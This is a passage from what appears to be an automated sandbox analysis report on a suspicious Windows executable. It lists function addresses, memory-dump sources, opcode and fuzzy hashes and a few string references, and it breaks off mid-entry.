Instruction Fuzzy Hash: F7018F3090968D8FCB95DF64C894AD97FB0FF19300F0501AAD408C71A1CB359995CB81

Function 00007FFD9BAB9395 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ff5a960652e58cd61f2aecc2d66bb0850e70fd4cc7437675f8e9ea1c20e78bf
Instruction ID: ff8d2e6edef50053c7bac0e3f71ce3c8d237dcdb869dca8a69dab57de904a4de
Opcode Fuzzy Hash: 1ff5a960652e58cd61f2aecc2d66bb0850e70fd4cc7437675f8e9ea1c20e78bf
Instruction Fuzzy Hash: CF01FD3190978C8FCB44DF18C8565ED3BE0FF68304F0102AAE858832A1DB39E654CB81

Function 00007FFD9BADBD05 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bad8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b944c45746e0d3c94328f29363be1a9e755d2e75070712295bda4099253c5a9
Instruction ID: 2b9f2125267a3fc2e59b9b7c3fc49fe46fba5310ac9f860e9bdda0bfd693387b
Opcode Fuzzy Hash: 8b944c45746e0d3c94328f29363be1a9e755d2e75070712295bda4099253c5a9
Instruction Fuzzy Hash: C0011D70908A4D8FDF95EF58C899A997BF0FF68300F4541E6E948C7261DA74D594CB40

Function 00007FFD9BAF2419 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07a06b865e8e49cdd8d4273124a0bd73a3ee726b46f9028f8d31092dc36d39d6
Instruction ID: 02b0c765362d911148eca4ec3c497e9570decb43ac6178819e9afe38f147feec
Opcode Fuzzy Hash: 07a06b865e8e49cdd8d4273124a0bd73a3ee726b46f9028f8d31092dc36d39d6
Instruction Fuzzy Hash: 9D01AF30A0964D9FCF84EF58C4A4AEA7BF0FF18304F1400AAE40DC32A1DB31A690CB81

Function 00007FFD9BAEB5F9 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbb915fbfede7f24948074660513303b9a7ffb8a38c46f647ca8c7cc3bd58921
Instruction ID: c19042b342d182eedc0303a0b6e72edfa03d4f7a230d7fcf7e74c4814eafeb6f
Opcode Fuzzy Hash: cbb915fbfede7f24948074660513303b9a7ffb8a38c46f647ca8c7cc3bd58921
Instruction Fuzzy Hash: F5018F3090868C8FCB95EF64C8A9AA97FB0FF65300F4500EAD448C71A2CB349A94CB40

Function 00007FFD9BAF4CC9 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9b03026e642f25da44e295852500ca2211665c0a886e5a43e279dafd08ed77a
Instruction ID: 52339dfd6f3851822bf6d4028b94d680625426bcf023bc419f450a86dba25a4d
Opcode Fuzzy Hash: f9b03026e642f25da44e295852500ca2211665c0a886e5a43e279dafd08ed77a
Instruction Fuzzy Hash: 67014B31A0968D8FDB95EF68C8546E97FB0FF55300F0505AAD418C72A6EB749A54CB40

Function 00007FFD9BC61B39 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2388673458.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bc60000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f90d0362ccb1c09af80e8f6abfc7b1b900116c2cbd0921a1264a6b397728158
Instruction ID: 8642b9904ebe09ca0226f758240d1c9f6abbd3dd4487d7aed2f50c50b4e8783f
Opcode Fuzzy Hash: 9f90d0362ccb1c09af80e8f6abfc7b1b900116c2cbd0921a1264a6b397728158
Instruction Fuzzy Hash: 67018F7090868D8FCB85DF68C868AAD7FB0FF65301F0540DBD448C71A2DB349A94CB80

Function 00007FFD9BAEBA98 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9e4f7f5bc44ba5fd5ac9d0e3d1689386f755b082b63519ce76e7861596abb9a
Instruction ID: dddf4400ce243015422369595079038ad4b5d7c9d9e76d6c9eef576ff39591d4
Opcode Fuzzy Hash: f9e4f7f5bc44ba5fd5ac9d0e3d1689386f755b082b63519ce76e7861596abb9a
Instruction Fuzzy Hash: F2011930914A4D9FCF84EF58C859AEA7BE0FF68305F01016AA40DD3260DB35A694CB80

Function 00007FFD9BAEE590 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c157d2bdae35add81129f495f788514ff3117eea6113332dfeeca39dede9836
Instruction ID: fa1f88dfed1d38373534c8f3e9d0c81f7d2e7bac850aa69e2ab2fe63d98f8321
Opcode Fuzzy Hash: 9c157d2bdae35add81129f495f788514ff3117eea6113332dfeeca39dede9836
Instruction Fuzzy Hash: CB01C97091490D8FDF84EF58C848AAEBBF0FB68305F00456AA41DD32A4DB709690CB80

Function 00007FFD9BAFC1F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c83f2794ff9070700c77329b7516756ea1c6f7139f57db45ce32e4a588b9f0dd
Instruction ID: 0106c64331c9c2ceb7b910ffd08938f7a506a134a20fac537d88c3b60cdf40e9
Opcode Fuzzy Hash: c83f2794ff9070700c77329b7516756ea1c6f7139f57db45ce32e4a588b9f0dd
Instruction Fuzzy Hash: 89F0E730914A4D9FCF84EF58C859AEA7BF0FB68305F0041AAA80DD3260DB31E694CB81

Function 00007FFD9BAEDBC0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15cccd002fe93da006191b32392443fc37dd25bd53bb16ca8c289a27feec90e2
Instruction ID: 397ea966f0880415f6ad377e37b4f8811d63d38468275db4d30e00321b4b0812
Opcode Fuzzy Hash: 15cccd002fe93da006191b32392443fc37dd25bd53bb16ca8c289a27feec90e2
Instruction Fuzzy Hash: 69F0EC30914A4D9FCF44EF58C859AE97BF0FF68305F00456AA80DD3260DB30E594CB81

Function 00007FFD9BAF3620 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33622e42abbb3bfd61dc999bdca2882b6a4df3b016b3e85fbe29af27d9465a9a
Instruction ID: fe6e13d909a83838e6ea32e17c11563a7550af0841553bf0d3e463061398ad18
Opcode Fuzzy Hash: 33622e42abbb3bfd61dc999bdca2882b6a4df3b016b3e85fbe29af27d9465a9a
Instruction Fuzzy Hash: 68F0EC30A1490DCFCF84EF58C848AEE77F0FB68304F00056AA41DD3250DB709654CB80

Function 00007FFD9BAEB610 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c80a8bf99777f9a2fedd5cc3e3d5a66ba5266b7e42ff36eebc591cf4d51ff6
Instruction ID: ab58d17d0fe92d09338d4786c1564ee7630c3b4c32da37c8895c4af7b1a5acb4
Opcode Fuzzy Hash: c1c80a8bf99777f9a2fedd5cc3e3d5a66ba5266b7e42ff36eebc591cf4d51ff6
Instruction Fuzzy Hash: 8DF0BD3091494D9FDF84EF58C499AAA7BF1FB68305F5041AAE41DD31A0DB719694CB80

Function 00007FFD9BAC0C81 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0cea380a759446cc71cba76ac2f5ab2dfe4557a756f4e4ab7813c0f265783e
Instruction ID: 6b020418212482232b1aceb9af340e18754fae136f4a3a3bd44c3ec61f1f3fc1
Opcode Fuzzy Hash: 7b0cea380a759446cc71cba76ac2f5ab2dfe4557a756f4e4ab7813c0f265783e
Instruction Fuzzy Hash: 13011271E0850E8BEB68EF84C4645BE7BB1EF54714F00063AD416D72A1DF7859418B44

Function 00007FFD9BAF2428 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dff646c59fe16cf3a7c2ef7284b723d3e5ca84030295b61076a434b55affdab
Instruction ID: 630a63dfd972361e6dd9d5cbaaf61ef29bea959d8bf87355eb1aabc7dc09d830
Opcode Fuzzy Hash: 0dff646c59fe16cf3a7c2ef7284b723d3e5ca84030295b61076a434b55affdab
Instruction Fuzzy Hash: AAF0BD30A14A4D9FDF94EF58C454AEA7BF0FF58305F1041AAE41DD3260DB71A694CB80

Function 00007FFD9BAB838D Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4aa81d6c61054553668d0465cdfced2040cf85260254b25950c04850dd12a0b8
Instruction ID: 5c454d106c3cda2c5d1b3fb9dfb0fe57277b8ec5704fc4905653712b3c38c802
Opcode Fuzzy Hash: 4aa81d6c61054553668d0465cdfced2040cf85260254b25950c04850dd12a0b8
Instruction Fuzzy Hash: 25F09A31509A8DCFCB90EF5CC895A9A3BE0FF69310F0501AAE52CC71A2D775E964CB81

Function 00007FFD9BAB8BAD Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93e9c56147de61e09a9b5a47cc0af4bad7b656cec28b63d6173d1e0643e35049
Instruction ID: 9480e911159c0fc85639596cc6e8fe94fdff4c958600b2755d7ff8b5f3a2e116
Opcode Fuzzy Hash: 93e9c56147de61e09a9b5a47cc0af4bad7b656cec28b63d6173d1e0643e35049
Instruction Fuzzy Hash: DBF0903090968DCFCB94EF18C8656993BE0FF69310F0501A6E418C7161D774D960CB81

Function 00007FFD9BAFCA10 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9af627059f82f3f9c41985f809b605fbb0d6c4b1c12e934007bbdc171c008f53
Instruction ID: 96884af26834d441bdaf0eff22005f158f0814284127834f2657edc9685d2275
Opcode Fuzzy Hash: 9af627059f82f3f9c41985f809b605fbb0d6c4b1c12e934007bbdc171c008f53
Instruction Fuzzy Hash: DCE06871A09B4C4FDB60EB599820AD47BA0FBC9304F04106AE00CC6290D6266944C341

Function 00007FFD9BAA0CCF Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baa0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66a8e46bd862dd1c264b8601e7146425ea82e3fbdda8c28e8f4373ade85bc838
Instruction ID: b0ecfdaa83253107f6dde934f83f127f00425914074495d8ab704310d41afb94
Opcode Fuzzy Hash: 66a8e46bd862dd1c264b8601e7146425ea82e3fbdda8c28e8f4373ade85bc838
Instruction Fuzzy Hash: 48F06270B0A61A8BE768DF94C8946FD73B2BF54711F04067AD01D922E2CBB86740CB55

Function 00007FFD9BAC4053 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc960756847011f46dc36691ebb9bf00d64170701a821e79703c128533db9791
Instruction ID: cf872cfedb85781231633e63d4bf17496d6efdc4381d4103571b2efb6e5aa414
Opcode Fuzzy Hash: dc960756847011f46dc36691ebb9bf00d64170701a821e79703c128533db9791
Instruction Fuzzy Hash: E6E06531F0A51D4FE7A4EB88C8712FD32A2EF99340F814175E41E972E2CD762A418B40

Function 00007FFD9BAB81ED Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAB7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bab7000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62089afa479d889c63ab3bb752c4786a948cede4922a7500ddf62c53ccf28304
Instruction ID: 6bda270e945e45838ccf5662145d2f5aaf6550e83750005d53f65cd052d474ab
Opcode Fuzzy Hash: 62089afa479d889c63ab3bb752c4786a948cede4922a7500ddf62c53ccf28304
Instruction Fuzzy Hash: F4F08C3184D68C9FDB51AB68886D6987FA0EF15311F0504EBD418C60A1DA349254CB01

Function 00007FFD9BAC19ED Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9babb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
Instruction ID: 2f1b9ff46708b12732a2b43872c50fd887aefb8acbb8535ae55448ab5000a9c0
Opcode Fuzzy Hash: 8bc95f78c279d735a495a1dd9b4c18142486d2ddc50111bd4a96b8a9533eb6fa
Instruction Fuzzy Hash: F3F07070F5E11D8AEB74ABF584557BC76B09F25301F71007AD00D931A2DE7856809F00

Function 00007FFD9BAA6B59 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baa0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52ba02469e64360f460100a5b885bf59138e283760371cc2b9d4f4f9540eda21
Instruction ID: abdac159f6c08fbc1b0a386664337e12690c34e4954035d4909e8744cfb652fc
Opcode Fuzzy Hash: 52ba02469e64360f460100a5b885bf59138e283760371cc2b9d4f4f9540eda21
Instruction Fuzzy Hash: 82E0E631E1556C49DBA5DB10C855AED73B1EF54301F4545F7800EB1595DDB456858F00

Function 00007FFD9BAA70E6 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baa0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b1f39765e7d85f5bd73d7ef8777b5c650a7ae58c5aed8193e7864bc75718315
Instruction ID: cd62c3e12d236e361688b6287dc5b3c2067a81a682d38567e014dd985994d6a6
Opcode Fuzzy Hash: 1b1f39765e7d85f5bd73d7ef8777b5c650a7ae58c5aed8193e7864bc75718315
Instruction Fuzzy Hash: 3DE01270A0A51A8AFB349B54C8583ACB3B1EF85300F1040B8C10E633D1CE781A80CF15

Function 00007FFD9BAEAD25 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c30af0225afb63adc87a4d995097b46d365252ca870b0a35356bfd44ca77ae
Instruction ID: 9312bd0bcc4031ad26c6c4293a3f45537469036f2e70e6ab9b3e8b491bd3b449
Opcode Fuzzy Hash: 07c30af0225afb63adc87a4d995097b46d365252ca870b0a35356bfd44ca77ae
Instruction Fuzzy Hash: CFD01730A1960E8EDB60EB10C414BAEB271FF54304F4042A5900D97196CA386A818F81

Non-executed Functions

Function 00007FFD9BAE2731 Relevance: 5.1, Strings: 4, Instructions: 65COMMON

Download Yara Rule

Strings

a, xrefs: 00007FFD9BAE3192
T, xrefs: 00007FFD9BAE2323
R, xrefs: 00007FFD9BAE3170
4, xrefs: 00007FFD9BAE273F

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAD8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9bad8000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: 4$R$T$a
API String ID: 0-2417396697
Opcode ID: 912397ed399fbf2e22c87c411b5060e10f78f1a1cc7bb4554bc7dd1ba4419243
Instruction ID: c3a6d7bdd24974979fead01153111d950625f555b269e4abc0bf0b5fa591ec5d
Opcode Fuzzy Hash: 912397ed399fbf2e22c87c411b5060e10f78f1a1cc7bb4554bc7dd1ba4419243
Instruction Fuzzy Hash: C1214DB0E0966D8BEB64DF94C4A43FC77F1EF14314F144079C009A62A1DEB86A84CF10

Function 00007FFD9BAF0DF9 Relevance: 5.0, Strings: 4, Instructions: 41COMMON

Download Yara Rule

Strings

?, xrefs: 00007FFD9BAF0A07
., xrefs: 00007FFD9BAF0E35
2, xrefs: 00007FFD9BAF0E0D
', xrefs: 00007FFD9BAF09D9

Memory Dump Source

Source File: 00000026.00000002.2379732373.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_7ffd9baea000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: '$.$2$?
API String ID: 0-982240037
Opcode ID: baf5e89a2e07f65d6d9ac4ce4e31866eb770e3759dfb3aec09b660b74caf1319
Instruction ID: 44ee7631437cc347f40373ea5b235db0f02647f12de6a974ba325d0282e7bff1
Opcode Fuzzy Hash: baf5e89a2e07f65d6d9ac4ce4e31866eb770e3759dfb3aec09b660b74caf1319
Instruction Fuzzy Hash: AB11F570A0921ACAE7A5DF54C8987A877B5EB10701F1181FAC40DA72A1DFB86BC8CF01

Analysis Process: EGjcLJxUTLCptztefbFicvsgXASnZ.exePID: 8068, Parent PID: 8056COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	7
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFD9BACBD2D Relevance: 1.8, Instructions: 1809
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bacb000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7126954e03156a8c8782cdf70d50597a24001f89527cdb0cf52ebf3508512011
Instruction ID: d5a12307382052f8e8fc821645202ec09e1686291e9e9d722d2dbdb8ceff9cc4
Opcode Fuzzy Hash: 7126954e03156a8c8782cdf70d50597a24001f89527cdb0cf52ebf3508512011
Instruction Fuzzy Hash: F3F22C71E19A1D8FDBA8EB58C8A5BB8B7B1FB58310F4441F9D04DD3292DA746A81CF40

Function 00007FFD9BB1CB41 Relevance: .6, Instructions: 553COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bb0f000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 659f689eb90481f49f902d1ef71a604ce079dca6ce913f77e7f160188b6fc313
Instruction ID: 3fc593172d8d8e18363ee9863ed98712a8f85b9585f8b920ed67fc2d8b9b5ead
Opcode Fuzzy Hash: 659f689eb90481f49f902d1ef71a604ce079dca6ce913f77e7f160188b6fc313
Instruction Fuzzy Hash: 91122B71A19A5D8FDBA4EF58C8A5BE9B7E1FB59304F4141FAD00DE3291DE346A80CB40

Function 00007FFD9BAFA4C7 Relevance: .4, Instructions: 406COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21d04d0e71cd344341071ed527d12ec391a2a53ab923ba7deb05d5fd21ea29b4
Instruction ID: 6ece5b17259c2a4bdef5c45c9be9b1fa52a6ebcbda4b1ab8ad3a06e72bad1c40
Opcode Fuzzy Hash: 21d04d0e71cd344341071ed527d12ec391a2a53ab923ba7deb05d5fd21ea29b4
Instruction Fuzzy Hash: C0020770E0421D8FDB58DFA8C4A19ECFBB1FF48304F148569D41AAB25ADB34A985CF54

Function 00007FFD9BAB0D70 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bab0000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b37f1883ea019e315c175f5cc9b0dd3beb8c71dafaeae9427cc63df3a65a9a0
Instruction ID: 5e306a979444c4ecf91a867f6f2c7e516841e6472921fcbe091b054bbfd27c3e
Opcode Fuzzy Hash: 8b37f1883ea019e315c175f5cc9b0dd3beb8c71dafaeae9427cc63df3a65a9a0
Instruction Fuzzy Hash: 2FA1CF71A18A9D8FE798DBA8C8757A97FE2EF59310F40017ED049D72D6CB781851CB40

Function 00007FFD9BB031B5 Relevance: 2.6, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4, xrefs: 00007FFD9BB0921C
,, xrefs: 00007FFD9BB08BE2

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: ,$4
API String ID: 0-508195717
Opcode ID: efe1d9a1c30f8d8233b72df2c7ec5796d14070f99da12c7b5133d372230829d8
Instruction ID: 88b180f12dddbb00405e2d5dd36c1c22dd59d7d871d64ac53bd47364cfdaea83
Opcode Fuzzy Hash: efe1d9a1c30f8d8233b72df2c7ec5796d14070f99da12c7b5133d372230829d8
Instruction Fuzzy Hash: 47412B70A0954DCFDB68DB94C868AB9B7B1FF59304F5141AAC04A972E5DB35AA81CF00

Function 00007FFD9BB03EC0 Relevance: 1.7, Strings: 1, Instructions: 488
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U, xrefs: 00007FFD9BB081EA

Memory Dump Source

Source File: 0000002B.00000002.2458791969.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_43_2_7ffd9bafa000_EGjcLJxUTLCptztefbFicvsgXASnZ.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 462baa50a1f4a77722769dd6eb87d125d225d9a5cabb54635a343951930dd619
Instruction ID: 70044df9f8577f0b3a857c9b5daa7d59445a1b069856e71a4b38281ded19b08a
Opcode Fuzzy Hash: 462baa50a1f4a77722769dd6eb87d125d225d9a5cabb54635a343951930dd619
Instruction Fuzzy Hash: 80D11A32B1AD4E4FDBA8DB5C98A4AB577D1FFA8314B0501BAD44DC72EADE24ED418340

Function 00007FFD9BAC215E Relevance: 1.7, APIs: 1, Instructions: 190
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32 ref: 00007FFD9BAC229A

Memory Dump Source

